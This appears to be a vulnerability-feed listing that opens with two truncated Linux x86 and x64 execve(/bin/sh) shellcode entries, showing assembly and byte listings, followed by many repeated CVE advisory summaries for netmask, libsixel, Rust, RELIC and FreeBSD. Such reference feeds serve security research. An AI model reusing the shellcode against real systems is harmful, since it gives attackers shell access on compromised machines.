Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)

Linux/x86 - execve/bin/sh Shellcode 17 bytes Author: s1ege Tested on: i686 GNU/Linux Shellcode length: 17 / ; nasm -felf32 shellcode.asm && ld -melfi386 shellcode.o -o shellcode section .text global start start: push 0x0b pop eax push 0x0068732f push 0x6e69622f mov ebx, esp int 0x80 / include...

Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)

Linux/x64 - execve/bin/sh Shellcode 21 bytes Author: s1ege Tested on: x8664 GNU/Linux Shellcode Length: 21 / objdump disassembly 401000: 50 push %rax 401001: 48 31 d2 xor %rdx,%rdx 401004: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 40100b: 2f 73 68 40100e: 53 push %rbx 40100f: 54 push...

Improper parsing of octal bytes in netmask

Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs...

GHSA-4C7M-WXVM-R7GC Improper parsing of octal bytes in netmask

Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs...

UBUNTU-CVE-2020-36120

Buffer Overflow in the "sixelencoderencodebytes" function of Libsixel v1.8.6 allows attackers to cause a Denial of Service DoS...

CVE-2020-36323

In the standard library in Rust before 1.52.0, there is an optimization for joining strings that can cause uninitialized bytes to be exposed or the program to crash if the borrowed string changes after its length is checked...

DEBIAN-CVE-2020-36323

In the standard library in Rust before 1.52.0, there is an optimization for joining strings that can cause uninitialized bytes to be exposed or the program to crash if the borrowed string changes after its length is checked...

CVE-2020-36323

In the standard library in Rust before 1.52.0, there is an optimization for joining strings that can cause uninitialized bytes to be exposed or the program to crash if the borrowed string changes after its length is checked...

ALPINE-CVE-2020-36323

In the standard library in Rust before 1.52.0, there is an optimization for joining strings that can cause uninitialized bytes to be exposed or the program to crash if the borrowed string changes after its length is checked...

Design/Logic Flaw

In the standard library in Rust before 1.52.0, there is an optimization for joining strings that can cause uninitialized bytes to be exposed or the program to crash if the borrowed string changes after its length is checked...

UBUNTU-CVE-2020-36323

In the standard library in Rust before 1.52.0, there is an optimization for joining strings that can cause uninitialized bytes to be exposed or the program to crash if the borrowed string changes after its length is checked...

CVE-2020-36323

In the standard library in Rust before 1.52.0, there is an optimization for joining strings that can cause uninitialized bytes to be exposed or the program to crash if the borrowed string changes after its length is checked...

CVE-2020-36323

In the standard library in Rust before 1.52.0, there is an optimization for joining strings that can cause uninitialized bytes to be exposed or the program to crash if the borrowed string changes after its length is checked...

CVE-2020-36323

In the standard library in Rust before 1.52.0, there is an optimization for joining strings that can cause uninitialized bytes to be exposed or the program to crash if the borrowed string changes after its length is checked...

Rust 格式化字符串错误漏洞

Rust is a general-purpose, compiled programming language from the Mozilla Foundation. A format string error vulnerability exists in the standard library in versions of Rust prior to 1.52.0, which stems from the fact that if the length of a borrowed string is changed after checking it, it could...

libsixel 缓冲区错误漏洞

Libsixel is a package that provides encoding/decoding implementations for DEC SIXEL graphics and other converter programs. A buffer overflow vulnerability exists in Libsixel version v1.8.6, which stems from a buffer overflow in the sixelencoderencodebytes function, and can be exploited by an...

CVE-2020-36316

In RELIC before 2021-04-03, there is a buffer overflow in PKCS1 v1.5 signature verification because garbage bytes can be present...

CVE-2020-25578

In FreeBSD 12.2-STABLE before r368969, 11.4-STABLE before r369047, 12.2-RELEASE before p3, 12.1-RELEASE before p13 and 11.4-RELEASE before p7 several file systems were not properly initializing the doff field of the dirent structures returned by VOPREADDIR. In particular, tmpfs5, smbfs5, autofs5...

CVE-2020-25579

In FreeBSD 12.2-STABLE before r368969, 11.4-STABLE before r369047, 12.2-RELEASE before p3, 12.1-RELEASE before p13 and 11.4-RELEASE before p7 msdosfs5 was failing to zero-fill a pair of padding fields in the dirent structure, resulting in a leak of three uninitialized bytes...

CVE-2020-25578

In FreeBSD 12.2-STABLE before r368969, 11.4-STABLE before r369047, 12.2-RELEASE before p3, 12.1-RELEASE before p13 and 11.4-RELEASE before p7 several file systems were not properly initializing the doff field of the dirent structures returned by VOPREADDIR. In particular, tmpfs5, smbfs5, autofs5...